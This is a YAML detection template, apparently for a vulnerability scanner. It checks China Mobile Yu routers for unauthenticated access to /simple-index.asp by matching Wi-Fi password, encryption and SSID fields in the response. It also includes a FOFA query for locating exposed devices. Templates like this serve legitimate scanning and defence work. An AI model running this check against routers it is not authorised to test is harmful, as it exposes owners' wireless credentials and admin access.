id: china-mobile-simple-index-asp-unauth

info:
  name: 中移动禹路由器 simple-index.asp 未授权漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    中移禹路由器simple-index.asp处存在未授权漏洞，攻击者可以获取后台权限。
    fofa：title="互联世界 物联未来-登录"
  reference:
    - https://mp.weixin.qq.com/s/nKwgNzSdV6a614IH0IbsLg
  created: 2023/05/26

rules:
  r0:
    request:
      method: GET
      path: /simple-index.asp
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'无线密码&nbsp;') &&
      response.body.bcontains(b'加密模式&nbsp;') &&
      response.body.bcontains(b'无线名称&nbsp;')
expression: r0()